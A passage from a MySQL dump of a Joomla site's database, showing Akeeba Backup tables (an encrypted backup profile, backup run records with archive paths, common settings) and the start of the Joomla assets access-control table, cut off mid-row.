INSERT INTO `vzx9b_ak_profiles` VALUES (1,'Default Backup Profile','###AES128###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','',1);
/*!40000 ALTER TABLE `vzx9b_ak_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_ak_stats`
--
DROP TABLE IF EXISTS `vzx9b_ak_stats`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_ak_stats` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`comment` longtext DEFAULT NULL,
`backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` enum('run','fail','complete') NOT NULL DEFAULT 'run',
`origin` varchar(30) NOT NULL DEFAULT 'backend',
`type` varchar(30) NOT NULL DEFAULT 'full',
`profile_id` bigint(20) NOT NULL DEFAULT 1,
`archivename` longtext DEFAULT NULL,
`absolute_path` longtext DEFAULT NULL,
`multipart` int(11) NOT NULL DEFAULT 0,
`tag` varchar(255) DEFAULT NULL,
`backupid` varchar(255) DEFAULT NULL,
`filesexist` tinyint(3) NOT NULL DEFAULT 1,
`remote_filename` varchar(1000) DEFAULT NULL,
`total_size` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `idx_fullstatus` (`filesexist`,`status`),
KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_ak_stats`
--
LOCK TABLES `vzx9b_ak_stats` WRITE;
/*!40000 ALTER TABLE `vzx9b_ak_stats` DISABLE KEYS */;
INSERT INTO `vzx9b_ak_stats` VALUES (8,'Backup taken on Tuesday, 01 June 2021 10:36','','2021-06-01 08:36:08','2021-06-01 08:37:59','complete','backend','full',1,'site-smithandsmith.co.za-20210601-123608.jpa','/home/smthsmth/public_html/administrator/components/com_akeeba/backup/site-smithandsmith.co.za-20210601-123608.jpa',1,'backend','id8',1,NULL,50393682),(9,'Backup taken on Friday, 09 July 2021 06:49','','2021-07-09 04:49:19','2021-07-09 04:52:48','complete','backend','full',1,'site-smithandsmith.co.za-20210709-084919.jpa','/home/smthsmth/public_html/administrator/components/com_akeeba/backup/site-smithandsmith.co.za-20210709-084919.jpa',1,'backend','id9',1,NULL,50264441);
/*!40000 ALTER TABLE `vzx9b_ak_stats` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_ak_storage`
--
DROP TABLE IF EXISTS `vzx9b_ak_storage`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_ak_storage` (
`tag` varchar(255) NOT NULL,
`lastupdate` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`data` longtext DEFAULT NULL,
PRIMARY KEY (`tag`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_ak_storage`
--
LOCK TABLES `vzx9b_ak_storage` WRITE;
/*!40000 ALTER TABLE `vzx9b_ak_storage` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_ak_storage` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_akeeba_common`
--
DROP TABLE IF EXISTS `vzx9b_akeeba_common`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_akeeba_common` (
`key` varchar(190) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
`value` longtext NOT NULL,
PRIMARY KEY (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_akeeba_common`
--
LOCK TABLES `vzx9b_akeeba_common` WRITE;
/*!40000 ALTER TABLE `vzx9b_akeeba_common` DISABLE KEYS */;
INSERT INTO `vzx9b_akeeba_common` VALUES ('file_fef','[\"com_akeeba\",\"com_admintools\"]'),('fof30','[\"com_akeeba\",\"com_admintools\",\"file_fef\"]'),('stats_lastrun','1625813323'),('stats_siteid','9ade65cbee3c5cd1c7708113564cd5c8730d8e9a'),('stats_siteurl','d95ab254b04b69d7f466dbb52690e0dd');
/*!40000 ALTER TABLE `vzx9b_akeeba_common` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_assets`
--
DROP TABLE IF EXISTS `vzx9b_assets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_assets` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`parent_id` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set parent.',
`lft` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set lft.',
`rgt` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set rgt.',
`level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.',
`name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n',
`title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.',
`rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_asset_name` (`name`),
KEY `idx_lft_rgt` (`lft`,`rgt`),
KEY `idx_parent_id` (`parent_id`)
) ENGINE=InnoDB AUTO_INCREMENT=247 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_assets`
--
LOCK TABLES `vzx9b_assets` WRITE;
/*!40000 ALTER TABLE `vzx9b_assets` DISABLE KEYS */;
INSERT INTO `vzx9b_assets` VALUES (1,0,1,342,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":[],\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,2,3,1,'com_admin','com_admin','{}'),(3,1,4,11,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,12,13,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,14,15,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,16,17,1,'com_config','com_config','{}'),(7,1,18,87,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(8,1,88,129,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,130,131,1,'com_cpanel','com_cpanel','{}'),(10,1,132,133,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,134,135,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,136,137,1,'com_login','com_login','{}'),(13,1,138,139,1,'com_mailto','com_mailto','{}'),(14,1,140,141,1,'com_massmail','com_massmail','{}'),(15,1,142,143,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1},\"core.edit\":[],\"core.edit.state\":[]}'),(16,1,144,147,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,37,38,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,150,201,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,202,209,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(20,1,210,211,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,212,213,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,214,215,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,216,217,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,218,221,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(26,1,222,223,1,'com_wrapper','com_wrapper','{}'),(33,1,284,285,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,8,105,108,2,'com_content.category.9','Uncategorised','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(35,3,7,8,2,'com_banners.category.10','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(36,7,23,24,2,'com_contact.category.11','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(37,19,205,206,2,'com_newsfeeds.category.12','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(40,3,9,10,2,'com_banners.category.15','Sample Data-Banners','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,7,25,86,2,'com_contact.category.16','Sample Data-Contact','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,19,207,208,2,'com_newsfeeds.category.17','Sample Data-Newsfeeds','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,8,111,118,2,'com_content.category.19','Joomla!','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(46,44,116,117,3,'com_content.category.21','Components','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(59,41,26,27,3,'com_contact.category.34','Park Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(60,41,28,85,3,'com_contact.category.35','Shop Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(61,60,29,30,4,'com_contact.category.36','Staff','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(62,60,31,84,4,'com_contact.category.37','Fruit 